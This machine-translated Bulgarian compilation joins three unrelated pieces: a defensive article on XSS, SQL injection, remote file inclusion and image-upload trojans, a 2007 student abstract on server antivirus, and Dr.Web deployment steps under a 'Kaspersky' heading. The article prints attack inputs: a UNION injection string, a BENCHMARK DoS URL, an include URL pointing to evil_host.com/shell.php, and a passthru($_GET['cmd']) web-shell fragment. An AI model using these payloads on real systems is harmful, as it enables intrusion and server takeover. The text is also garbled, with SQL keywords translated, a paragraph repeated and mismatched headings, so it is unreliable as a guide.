Какво правят хакерите с XSS?- Кражба на бисквитки (бисквитки, кифли) - тези текстови файлове съхраняват информация, която сървърът "поставя" на потребителя за последващата му идентификация. В примера, ако създадете файл test.html с това съдържание (напишете го сами), тогава, когато се стартира в браузър, той ще изведе XSS.
Уважаеми администраторе, възникна грешка при посещението на сайта
ПомогнеНо можете да напишете скрипт на Java и по-сериозно. Обикновено такива скриптове се записват в уеб пощата на администратора и чрез социално инженерство се опитват да го накарат да прочете съобщението, за да получи бисквитките си.
Ако бисквитките не са обвързани с IP адреса и допълнителни меркизащита, те заменят своите бисквитки с администраторски бисквитки и се опитват да влязат в административния панел, който не проверява данните за вход и парола и идентифицира хората само чрез бисквитки.
- Deface на сайта (deface - замяна на началната страница на сайта, най-често index.html)
- Троянизация на отдалечен потребител. Избират се нови експлойти за браузърите на потребителите и когато те влязат в уязвима страница, се прави опит за заразяване на компютъра с троянски кон. Ако потребителят има антивирусна програма с инсталирани нови бази данни, тогава той ще посочи появата на троянски кон в системата. И вашият сайт ще падне в очите на потребителя, може би той няма да дойде отново при вас.
- DoS. При голям брой посетители, скриптът допълнително ще поиска още други страници от вашия сървър или от друг, някой може да има DoS.
Решение на проблема:
- За да блокирате писането на html тагове в базата данни от полетата за въвеждане, използвайте конструкции като htmlspecialchars за PHP, които ще заменят< на <, >към >, & към & и така нататък
пример,$comment = htmlspecialchars($comment, ENT_QUOTES);
$query = "вмъкване в книгата за гости
(име, местоположение, имейл, url, коментар) стойности
("$name", "$location", "$email", "$url", "$comment")");
mysql_query($query) или die(mysql_error()); - Проверете и филтрирайте във вашите скриптове всички параметри, които потребителят въвежда и се предават на скрипта през адресната лента. Научете как правилно да използвате регулярни изрази за анализ на входящи данни. За вашия език за програмиране намерете материал, който ви учи как да кодирате безопасно.
- Ако желаете да използвате технология за бисквитки на вашия сайт, моля, прочетете нашите практики за сигурност на бисквитките. Ограничете действията им във времето и по IP адреси.
- Като администратор, бъдете бдителни, когато бъдете измамени чрез социално инженерство. Не забравяйте за сигурността на личния компютър зад вашия клиентски компютър.
- Кражба на бисквитки (бисквитки, кифли) - тези текстови файлове съхраняват информация, която сървърът "поставя" на потребителя за последващата му идентификация. В примера, ако създадете файл test.html с това съдържание (напишете го сами), тогава, когато се стартира в браузър, той ще изведе XSS.
- SQL инжекция. SQL инжекция.
Това заболяване означава, че неотметнат параметър е заменен в SQL заявката, която се появява в скрипта. Скриптове, страдащи от хакерски находки за инжектиране на SQL по прост начин, стойността на параметъра се предоставя с цитат site.com/view.php?id=1" или числовият параметър се модифицира като този site.com/view.php?id=2-1.Ако заместеният цитат причинява "грешка" (много съобщения, че такава и такава заявка не се изпълнява в такъв и такъв скрипт по такъв път), тогава такъв скрипт е кандидат за по-нататъшното му изпомпване. Често нападателите използват хакването на Google, питайки търсачката нещо като това „сайт: www.victim.ru Предупреждение". Търсачката на Google ще върне неправилни скриптове на вашия сайт, толкова древни, че отдавна са индексирани от паяка на Google .
Код, който не проверява стойността и страда от SQL инжектиране
$id = $_REQUEST["id"];
$result = mysql_query("ИЗБЕРЕТЕ заглавие, текст, датановини, автор ОТ `новини` КЪДЕ `id`="$id"");Сега си представете, че вместо число ще бъдете заменено с "-1 union select null/*" (без кавички) и тогава вашата заявка ще се превърне в
ИЗБЕРЕТЕ заглавие, текст, дата, новини, автор ОТ `news` WHERE `id`="-1 съюз изберете null/*"
Тоест, хакерът иска неговата заявка да бъде изпълнена в допълнение към вашата заявка, комбинирана с вашата чрез директивата union. И тогава хакерът ще се опита да направи други заявки и, като се има предвид силата на езика SQL, това не вещае нищо добро за администратора. От deface (deface - замяна на началната страница на сайта) до получаване на root права на вашия сървър. Хакер може също така да извърши DoS атака благодарение на SQL инжекция: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(current_date))) няколко такива заявки и сървърът е на 100% CPU натоварване за дълго време.
Защита от SQL инжектиране:
- Използвайте широко функциите на SQL Server като изгледи и съхранени процедури. Това ще ограничи неоторизиран достъп до базата данни.
- Преди да подаде параметър към заявката, той трябва да бъде проверен за тип (за PHP - is_bool(), is_float(), is_int(), is_string(), is_object(), is_array() и is_integer()) и поне , цитиран с помощта на конструкцията тип addslashes за PHP.
- Всички скриптове работят с базата данни от някакъв акаунт в база данни, премахнете всички привилегии от този акаунт, които не са необходими за работа. Често хакерите използват командата MySQL (MySQL е взета като пример, това важи за всеки SQL сървър) "LOAD DATA INFILE", за да прочетат необходимите им файлове от сървъра и четливия акаунт, под който работи MySQL. Оттук заключението, деактивирайте ненужните привилегии за вашите скриптове, като FILE, които са необходими за използване на командата LOAD DATA INFILE. За основа трябва да се вземе принципът на "базовия минимум".
- Системният акаунт, под който работи SQL сървърът, не трябва да има достъп до страниците на сайта и системните файлове на сървъра.
- Свързване на файлове. Включете файл. Да кажем, че има страница site.com/getnews.php?file=190607, но авторът на скрипта, използвайки include, свързва страницата без проверки.
$file = $_REQUEST["файл"];
включвам ($файл.".html");Хакерът ще замени evil_host.com/shell.php вместо 190607 и тогава цялата адресна лента на хакерския браузър ще изглежда така site.com/postnews.php?file=evil_host.com/shell.php и хакерът ще има неговата собствена уеб обвивка на вашия сайт с правата, които има Apache.
Защита на файловата връзка:
- Проверете и филтрирайте във вашите скриптове всички параметри, които потребителят въвежда и се предават на скрипта през адресната лента. За вашия език за програмиране намерете материал, който ви учи как да кодирате безопасно.
- Хакерите наистина харесват, когато езикът за програмиране на сайта ви позволява да изпълнявате системни команди. Следователно трябва да забраните извикването на такива функции на вашия език за програмиране, ако, разбира се, това е възможно. Например в настройките на PHP е възможно да посочите списък със „забранени“ функции, като използвате disable_functions в php.ini.
- Троянска картина
Ако имате възможност да качвате файлове на сървъра на сайта, бъдете готови да качвате, например, снимки на аватар. В картина във формат JPEG има понятието метаданни (помнете къде камерата записва информация, когато снима кадър) и тези метаданни ще бъдат записаниecho "
";passthru($_GET["cmd"]);ехо "
"; ?>изображението ще бъде преименувано на avatara.jpg.php, за да заобиколи повечето проверки на разширенията и ще използва site.com/upload_images/avatara.jpg.php?cmd=server_commands
Троянска защита:
- Проверете правилно разширението на файла. Дори и да обработвате разрешените файлове правилно, бъдете готови изображението от jpg на php да бъде преименувано чрез друга уязвимост на вашия сайт. Проверете за метаданни в изображение с функции като exif_read_data() в PHP.
- Предотвратете изпълнението на езици за програмиране в директории с изображения посредством вашия уеб сървър. За да направите това, погледнете в конфигурационните редове на Apache като „AddType application/x-httpd-“, които свързват езиците за програмиране с файлови разширения и забраняват тяхното изпълнение в директории с изображения. За Apache забраната за изпълнение на PHP езикови файлове ще бъде конструкция
Поръчка откажи, разреши
Отказва от всички
- За вашия език за програмиране намерете материал, който ви учи как да кодирате сигурно, когато обработвате изображения и правилното им качване на сървъра.
Лични благодарности:
- приятел Alexander Pupyshev aka lynx за критика и съвет
- сайт antichat.ru/
- www.xakep.ru/
- книга от Майкъл Ебен, Браян Тайман. Администриране на FreeBSD: Изкуството на балансиране
- книга от Джоел Скамбрей, Стюарт МакКлюр, Джордж Кърц. Тайните на хакерите: Мрежова сигурност - готови решения. Второ издание
Други източници на информация за защита:
- Страницата с ръководство за сигурност на FreeBSD man съдържа описание на общи проблеми със сигурността и добри административни практики.
- Абонирайте се за пощенските списъци на freebsd-security @ freebsd.org. За да направите това, изпратете имейл до majordomo @ freebsd.org с subscribe freebsd-security в тялото на съобщението. Именно в този пощенски списък се обсъждат най-належащите проблеми със сигурността.
- Страница с информация за сигурността на FreeBSD freebsd.org/security/
- FreeBSD Security How-To документ
- Сайтът CERT.org съдържа информация за уязвимости в защитата на всички операционни системи.
- Защитни стени и интернет сигурност от Уилям Р. Чесуик и Стивън М. Белоуин
- Изграждане на интернет защитни стени, 2-ро издание от Брент Чапман и Елизабет Цвики
Резултат:
Надявам се, че статията ви помогна да видите всички проблеми заедно, сега администраторът трябва да прочете за компютърната сигурност, базите данни, уеб сървърите, езиците за програмиране от допълнителни източници. Обобщавайки статията накратко, трябва да сте наясно с новините за освобождаването на проблеми със сигурността, да актуализирате и проверявате всички входни данни за коректност във вашите разработки.
Нека силата бъде с теб!
Държавен университет Чита Енергиен институт Факултет по икономика и информатика Катедра по приложна информатика и математика Резюме по темата: Потребител на компютър по темата: Антивирусен софтуер за сървъри Завършен: чл. гр. ПИ-07-1 Злова В. В. Проверени: чл. учител кафене Pimmonic I.P. Чита, 2007 г Съдържание
Въведение. 3
1 Файловите сървъри като един от източниците на разпространение на вируси. 5
2 Антивирусен софтуер за LAN сървъри. 5
3 Антивирусен софтуер за пощенски сървъри. 8
4 Kaspersky Anti-Virus. единадесет
Заключение. 17
Списък с литература.. 18
ВъведениеКомпютърните вируси са една от най-опасните заплахи за информационната сигурност днес. Компютърният вирус е специално написана програма, която може спонтанно да се прикрепя към други програми, да създава свои копия и да ги инжектира във файлове, области на компютърна система и компютърни мрежи, за да наруши програмите, да повреди файлове и директории и да създаде всякакви смущения в работа на компютър.Под информационна сигурност се разбира защитата на информацията и поддържащата я инфраструктура от всякакви случайни или злонамерени въздействия, резултатът от които може да бъде увреждане на самата информация, нейните собственици или поддържащата инфраструктура. Задачите на информационната сигурност се свеждат до минимизиране на щетите, както и до прогнозиране и предотвратяване на такива въздействия.
За повечето организации защитата на мрежовите ресурси от неоторизиран достъп се превръща в един от най-належащите проблеми. Особено тревожен е фактът, че интернет вече се използва широко за транспортиране и съхраняване на различни данни и поверителна корпоративна информация.
Задачата за защита на информацията е особено актуална за собствениците на онлайн информационни бази данни, издателите на електронни списания и др.
Към днешна дата са създадени много антивирусни програми за борба с вируси.Антивирусната програма (антивирус) първоначално е програма за откриване и лечение на програми, заразени с компютърен вирус, както и за предотвратяване на заразяване на файл от вирус (например чрез ваксинация). Много съвременни антивирусни програми също ви позволяват да откривате и премахвате троянски коне и други злонамерени програми. Антивирусният софтуер се състои от компютърни програми, които се опитват да открият, предотвратят и премахнат компютърни вируси и друг зловреден софтуер.Антивирусният софтуер помага да защитите вашия компютър от известни вируси, червеи, троянски коне и друг зловреден софтуер, който може да се срине при работа на компютъра. В момента файловите и пощенските сървъри са основният инструмент за управление на данни. Съхранението, обменът и предаването на данни са основните задачи при такова управление, но те са невъзможни без лесен достъп до информация, интеграция на данни и стабилност на системата. Файловият сървър е един от най-уязвимите мрежови ресурси. В случай на инфекция или неизправност достъпът до други мрежови ресурси може да бъде ограничен. Един заразен файл може да доведе до заразяване на голямо количество данни, загуба на интеграция на данни и повреда на системата. Такива рискове водят до високата цена на продуктите за управление на сървърни и мрежови ресурси. „Обществените“ файлови сървъри и електронните конференции са един от основните източници на разпространение на вируси. Почти всяка седмица има съобщение, че някой потребител е заразил компютъра си с вирус, който е взет от BBS, ftp сървър или от някаква електронна конференция. В същото време заразените файлове често се "поставят" от автора на вируса на няколко BBS/ftp или се изпращат на няколко конференции едновременно, като тези файлове се маскират като нови версии на някакъв софтуер (понякога - под нови версии на антивируси). В случай на масово разпространение на вирус чрез ftp/BBS файлови сървъри, хиляди компютри могат да бъдат засегнати почти едновременно, но в повечето случаи се „полагат“ DOS или Windows вируси, чиято скорост на разпространение в съвременните условия е много по-ниска отколкото макро вируси. Поради тази причина такива инциденти почти никога не завършват с масови епидемии, което не може да се каже за макровирусите. 2 Антивирусен софтуер за LAN сървъриВъпросите за ефективната антивирусна защита днес са по-актуални от всякога в корпоративния сектор и сред частните потребители, но за разлика от последните, проблемите и предизвикателствата, пред които са изправени компаниите, са много по-сериозни и изискват решения от различно ниво. Администраторите на корпоративни информационни системи трябва да инсталират антивирусни инструменти, да ги конфигурират и да конфигурират политики за актуализиране и да гарантират, че антивирусите са постоянно активирани на стотици или дори хиляди машини - и често това трябва да се прави ръчно. Локалните мрежи са един от основните източници на разпространение на вируси. Ако не вземете необходимите мерки за защита, тогава заразена работна станция, когато влезе в мрежата, заразява един или повече сервизни файлове на сървъра (в случая на Novell NetWare - LOGIN.COM). На следващия ден потребителите стартират заразени файлове, когато влязат в мрежата. Вместо сервизния файл LOGIN.COM може да действа и различен софтуер, инсталиран на сървъра, стандартни шаблонни документи или Excel таблици, използвани в компанията.
Опасността от заразяване на компютърни мрежи е реална за всяко предприятие, но вирусна епидемия наистина може да се развие в локалните мрежи на големи икономически и индустриални комплекси с териториално разклонена инфраструктура. Техните компютърни мрежи, като правило, са създадени на етапи, използвайки различен хардуер и софтуер. Очевидно за такива предприятия проблемът с антивирусната защита става много труден не само технически, но и финансово.
В същото време решаването на този проблем се постига чрез комбинация от организационни мерки и софтуерни и хардуерни решения. Този подход не изисква големи технически и непосредствени финансови разходи и може да се използва за цялостна антивирусна защита на локалната мрежа на всяко предприятие.
Следните принципи могат да послужат като основа за изграждане на такава система за антивирусна защита:
Принципът на прилагане на единна техническа политика при обосноваване на избора на антивирусни продукти за различни сегменти на локалната мрежа;
Принципът на пълно покритие на цялата локална мрежа на организацията от системата за антивирусна защита;
Принципът на непрекъснатост на контрола на локалната мрежа на предприятието, за навременно откриване на компютърни инфекции;
Принципът на централизирано управление на антивирусната защита;
Принципът на прилагане на единна техническа политика предвижда използването във всички сегменти на локалната мрежа само на антивирусен софтуер, препоръчан от отдела за антивирусна защита на предприятието. Тази политика е с дългосрочен характер, одобрена е от ръководството на компанията и е основа за целенасочено и дългосрочно планиране на разходите за закупуване на антивирусни софтуерни продукти и тяхното по-нататъшно актуализиране.
Принципът на пълно покритие на локалната мрежа от системата за антивирусна защита предвижда постепенно въвеждане на софтуер за антивирусна защита в мрежата до нейното пълно насищане в комбинация с организационни и режимни мерки за защита на информацията.
Принципът на непрекъснат контрол върху антивирусното състояние на локална мрежа предполага такава организация на нейната защита, която осигурява постоянна възможност за наблюдение на състоянието на мрежата за откриване на вируси.
Принципът на централизирано управление на антивирусната защита осигурява управление на системата от едно тяло с помощта на хардуер и софтуер. Именно този орган организира централизиран контрол в мрежата, получава контролни данни или доклади от потребителите от техните работни места за откриване на вируси и осигурява изпълнението на взетите решения за управление на системата за антивирусна защита. локалната мрежа на голяма организация е сложен проблем, който не може да бъде сведен до просто инсталиране на антивирусни продукти. По правило е необходимо създаването на отделна подсистема. От техническа гледна точка при решаването на този проблем трябва да се обърне специално внимание на тестването на всички новозакупени антивирусни програми, както и инсталирането на антивирусни пакети на пощенските сървъри. 3 Антивирусен софтуер за пощенски сървъри
Ако в зората на развитието на компютърните технологии основният канал за разпространение на вируси беше обменът на програмни файлове чрез дискети, днес дланта принадлежи на електронната поща. Електронната поща е удобно и незаменимо средство за бизнес комуникация. Повечето от вирусите и нежеланата поща обаче се разпространяват чрез електронна поща и тя може да бъде канал за изтичане на поверителни данни. Всеки ден през неговите канали се предават милиони и милиони съобщения и много от тези съобщения са заразени с вируси.
За съжаление, прикачените файлове, изпратени с имейл съобщения, също могат да бъдат изключително вредни за здравето на вашия компютър. Каква е опасността от прикачените файлове? Като такъв файл на потребителя може да бъде изпратен вирус или троянска програма или документ във формат Microsoft Office (*.doc, *.xls), заразен с компютърен вирус. Чрез стартиране на получената програма за изпълнение или отваряне на документ за преглед, потребителят може да инициира вирус или да инсталира троянска програма на своя компютър. Освен това, поради неправилни настройки на пощенската програма или грешки в нея, прикачените файлове могат да се отварят автоматично, когато преглеждате съдържанието на получените писма. В този случай, ако не предприемете никакви предпазни мерки, проникването на вируси или други злонамерени програми във вашия компютър е въпрос на време.Възможни са и други опити за проникване в компютъра ви чрез електронна поща. Например, те могат да изпратят съобщение под формата на HTML документ, който има вградена троянска ActiveX контрола. Отваряйки такова съобщение, можете да изтеглите този елемент на компютъра си, след което той веднага ще започне да върши работата си Троян за електронна поща - троянски коне, които ви позволяват да "изваждате" пароли и друга информация от файлове на вашия компютър и изпратете ги по имейл на собственика. Това могат да бъдат влизания и интернет пароли на доставчика, парола от пощенска кутия , ICQ и IRC пароли и т.н. За да изпрати писмо до собственика по пощата, троянският кон се свързва с пощенския сървър на сайта чрез SMTP протокола (например smtp.mail.ru). След като събере необходимите данни, троянският кон ще провери дали данните са изпратени. Ако не, данните се изпращат и съхраняват в регистъра. Ако вече са изпратени, тогава предишното писмо се извлича от регистъра и се сравнява с текущото. Ако има промени в информацията (появили са се нови данни), тогава писмото се изпраща и в регистъра се записват нови данни за паролите. С една дума, този тип троянски кон просто събира информация и жертвата може дори да не разбере, че някой вече знае техните пароли.Архивът на такъв троянски кон обикновено съдържа 4 файла: сървърен редактор (конфигуратор), троянски сървър, пакетиращ (лепил) файлове, инструкции за използване.В резултат на работата могат да бъдат определени следните данни: 1) IP адрес на компютъра на жертвата 2) подробна информация за системата (компютърно и потребителско име, версия на Windows, модем и др.) ); 3) всички кеширани пароли; 4) всички настройки за телефонна връзка, включително телефонни номера, данни за влизане и пароли; 5) ICQ пароли; 6) броя на последно посетените сайтове. .За да се предпазите от вируси, които се разпространяват по имейл, можете инсталирайте антивируси на компютрите на подателя и получателя. Тази защита обаче често не е достатъчна. Конвенционалните антивирусни програми, инсталирани на компютрите на интернет потребителите, са предназначени да сканират файлове и не винаги могат да анализират потока от данни от електронната поща. Ако антивирусът не сканира автоматично всички отворени файлове, тогава вирус или троянски кон може лесно да проникне през защитата върху компютърния диск.В допълнение, ефективността на антивирусите зависи много от спазването на правилата за тяхното използване: необходимо е да актуализирате периодично антивирусната база данни, да използвате правилните настройки на антивирусния скенер и т.н. За съжаление, много собственици на компютри не знаят как да използват правилно антивирусите или не актуализират антивирусната база данни, което неизбежно води до заразяване с вируси.Разбирайки уместността на проблема с разпространението на вируси по имейл, много компании предлагат специални анти- вирусни програми за защита на пощенските сървъри. Такива антивируси анализират потока от данни, преминаващ през пощенския сървър, предотвратявайки предаването на съобщения със заразени прикачени файлове. Има и друго решение - свързване към пощенски сървъри с конвенционални антивируси, предназначени за сканиране на файлове.Антивирусната защита на SMTP и POP3 пощенските сървъри е много по-ефективна от антивирусната защита на компютрите на потребителите. По правило опитен администратор е отговорен за настройката на антивируси на сървъра, който няма да направи грешка при настройката и освен това ще активира режима за автоматично актуализиране на базата данни през Интернет. Потребителите на защитени SMTP и POP3 сървъри не трябва да се притесняват за основния канал за разпространение на вируси - те ще получат съобщения, които вече са почистени от вируси.Действията, извършвани от пощенските сървъри при изпращане и получаване на заразени съобщения, зависят от настройките на антивирусната програма и самия пощенски сървър. Например, когато подателят се опита да изпрати съобщение със заразен файл, защитеният SMTP сървър за електронна поща ще го откаже и програмата за електронна поща ще покаже предупредително съобщение. вместо това ще дойде само съобщение за откриване на вирус. непрекъснато нарастващата популярност на платформата Microsoft WindowsДнес повечето интернет сървъри работят с Linux, FreeBSD и подобни UNIX-подобни операционни системи. Основното предимство на Linux е много ниската цена на придобиване. Всеки може да изтегли Linux дистрибуция от интернет и да я инсталира на произволен брой компютри. Тази дистрибуция има всичко необходимо за създаване на интернет възел, включително имейл сървъри, дистанционно управление с помощта на текстова конзола и др. За операционната система от тази серия са създадени само няколко десетки вируса, което показва нейната висока сигурност.
4 Kaspersky Anti-Virus
Кратки инструкции за разполагане на антивирусна мрежа:
1. Направете план за структурата на антивирусната мрежа, включително всички защитени компютри и мобилни устройства.
Изберете компютър, който ще изпълнява функциите на Dr.Web Server. Антивирусната мрежа може да включва няколко Dr.Web сървъра. Характеристиките на тази конфигурация са описани вРъководство на администратора, П. Характеристики на мрежа с няколко Dr.Web сървъра.
Dr.Web Server може да се инсталира на всеки компютър, не само на компютър, който функционира като LAN сървър. Основните изисквания към този компютър са дадени в стр.Системни изисквания. Една и съща версия на Dr.Web Agent е инсталирана на всички защитени станции, включително LAN сървъри. Разликата е в списъка с инсталирани антивирусни компоненти, определен от настройките на сървъра. |
За да инсталирате Dr.Web Server и Dr.Web Agent, е необходим еднократен достъп (физически или чрез средства за дистанционно управление и стартиране на програми) до съответните компютри. Всички допълнителни действия се извършват от работната станция на администратора на антивирусната мрежа (включително, евентуално извън локалната мрежа) и не изискват достъп до Dr.Web сървъри или работни станции.
2. Според плана определете кои продукти за кои операционни системи ще трябва да бъдат инсталирани на съответните мрежови възли. За подробна информация за предлаганите продукти вжСъдържание на доставката.
Всички необходими продукти могат да бъдат закупени като Dr.Web Enterprise Security Suite в кутия или изтеглени от уебсайта на Doctor Webhttps://download.drweb.ru/.
Dr.Web Агенти за станции под Android OS, Linux OS, OS X могат да бъдат инсталирани и от пакети за самостоятелни продукти и впоследствие свързани към централизирания Dr.Web сървър. Описание на съответните настройки на агентите е дадено вРъководство за инсталиране, П. Инсталиране на Dr.Web Agent чрез личен инсталационен пакет. |
3. Инсталирайте основния комплект за разпространение на Dr.Web Server на избрания компютър или компютри. Описание на инсталацията е дадено вРъководство за инсталиране, П. Инсталиране на Dr.Web сървър.
Заедно със сървъра се инсталира Dr.Web Security Control Center.
По подразбиране Dr.Web Server стартира автоматично след инсталация и след всяко рестартиране на операционната система.
4. Ако антивирусната мрежа ще включва защитени станции под Android OS, Linux OS, OS X, инсталирайте допълнителния пакет за разпространение на Dr.Web Server на всички компютри, на които е инсталиран основният пакет за разпространение на сървъра.
5. Ако е необходимо, инсталирайте и конфигурирайте прокси сървъра. Описанието е дадено вРъководство за инсталиране, П. Настройка на прокси сървъра.
6. За да конфигурирате Сървъра и антивирусния софтуер на станциите, трябва да се свържете със Сървъра с помощта на Dr.Web Security Control Center.
Контролният център е достъпен на адрес:
http://<Адрес_Сервера> :9080
или
https://<Адрес_Сервера> :9081
където като<Адрес_Сервера> посочете IP адреса или името на домейна на компютъра, на който е инсталиран Dr.Web Server.
Името на администратора по подразбиране еадминистратор
Парола:
за Windows OS, паролата, която е зададена по време на инсталирането на сървъра.
за ОС от фамилията UNIX -корен.
При успешно свързване към сървъра ще се отвори основният прозорец на Центъра за управление (за подробно описание вижтеРъководство на администратора, в п. Център за контрол на сигурността Dr.Web).
7. Извършете първоначалната конфигурация на сървъра (за подробно описание на настройките на сървъра вижтеРъководство на администратора, В Глава 7: Конфигуриране на Dr.Web сървър):
а. В глава Мениджър на лицензидобавете един или повече лицензионни ключове и ги разпределете на съответните групи, по-специално на групатаВсеки . Тази стъпка е необходима, ако по време на инсталирането на сървъра не е зададен лицензен ключ.
b. В глава Обща конфигурация на хранилищетопосочете кои компоненти на антивирусната мрежа ще се актуализират от Dr.Web GUS. В главаСъстояние на хранилищетоактуализирайте продукти в сървърното хранилище. Актуализацията може да отнеме много време. Изчакайте процеса на актуализиране да завърши, преди да продължите с по-нататъшна конфигурация.
° С. На страницата Администриране → Dr.Web сървърпредоставя информация за версията на сървъра. Ако е налична нова версия, актуализирайте сървъра, както е описано вРъководство на администратора, П. Обновяване на Dr.Web сървър и възстановяване от резервно копие.
д. Коригирайте, ако е необходимоИнтернет връзказа промяна на мрежовите настройки по подразбиране, използвани за взаимодействие между всички компоненти на антивирусната мрежа.
д. Ако е необходимо, конфигурирайте списъка с администратори на сървъра. Налично е и външно удостоверяване на администраторите. За подробности вжРъководство на администратора, В Глава 4: Администратори на антивирусната мрежа.
f. Преди да стартирате работата на антивирусния софтуер, се препоръчва да промените настройката на критичната директория за архивиране на данни на сървъра (вж.Ръководство на администратора, П. Настройка на графика на сървъра Dr.Web). Желателно е тази директория да се постави на друг локален диск, за да се намали възможността от едновременна загуба на софтуерните файлове на сървъра и резервното копие.
8. Задайте настройките и конфигурацията на антивирусния софтуер за работни станции (за подробно описание на конфигурирането на групи и станции вижтеРъководство на администратора, В Глава 5И Глава 6):
а. Ако е необходимо, създайте потребителски групи от станции.
b. Задаване на групови настройкиВсеки и създадени потребителски групи. По-специално, конфигурирайте раздела за инсталирани компоненти.
9. Инсталирайте софтуера Dr.Web Agent на работни станции.
В глава Инсталационни файловепрочетете списъка с предоставените файлове за инсталиране на агента. Изберете опцията за инсталиране, която ви подхожда въз основа на операционната система на станцията, възможността за отдалечена инсталация, опцията за указване на настройките на сървъра при инсталиране на агента и др. Например:
Ако потребителите инсталират антивирусната програма сами, използвайте персонални инсталационни пакети, които се създават чрез Центъра за управление отделно за всяка станция. Този тип пакети могат също да бъдат изпращани на потребителите по имейл директно от Центъра за управление. След инсталирането станциите се свързват автоматично към сървъра.
За отдалечено инсталиране по мрежа към станция или няколко станции едновременно (само за станции под Windows OS), използвайте мрежовия инсталатор. Инсталацията се извършва чрез Центъра за управление с помощта на разширение на браузъра.
Възможно е също така да се инсталира дистанционно през мрежата към станция или няколко станции едновременно с помощта на услугата Active Directory. За да направите това, използвайте инсталатора на Dr.Web Agent за мрежи с Active Directory, доставен с пакета за разпространение на Dr.Web Enterprise Security Suite, но отделно от инсталатора на сървъра.
Ако е необходимо да се намали натоварването на комуникационния канал между сървъра и станциите по време на инсталацията, можете да използвате пълния инсталатор, който инсталира агента и компонентите за защита едновременно.
Инсталирането на станции под Android OS, Linux OS, OS X може да се извърши локално според общите правила. Също така, вече инсталиран самостоятелен продукт може да се свърже със сървъра въз основа на подходящата конфигурация.
10. Веднага след като бъдат инсталирани на компютри, Агентите автоматично установяват връзка със Сървъра. Упълномощаването на антивирусни станции на сървъра става в съответствие с политиката, която сте избрали (вижтеРъководство на администратора, П. Политика за свързване на станция):
а. При инсталиране от инсталационни пакети, както и при конфигуриране на автоматично потвърждение на Сървъра, работните станции се регистрират автоматично, когато се свържат със Сървъра за първи път и не е необходимо допълнително потвърждение.
b. При инсталиране от инсталатори и конфигуриране на потвърждение за ръчен достъп, администраторът трябва ръчно да одобри нови работни станции за тяхната регистрация на сървъра. В този случай новите работни станции не се свързват автоматично, а се поставят от Сървъра в групата на начинаещите.
11. След свързване към сървъра и получаване на настройките, съответният набор от компоненти на антивирусния пакет, посочени в настройките на основната група на станцията, се инсталира на станцията.
12. Конфигурирането на станции и антивирусен софтуер също е възможно след инсталирането (за подробно описание вижтеРъководство на администратора, В Глава 6).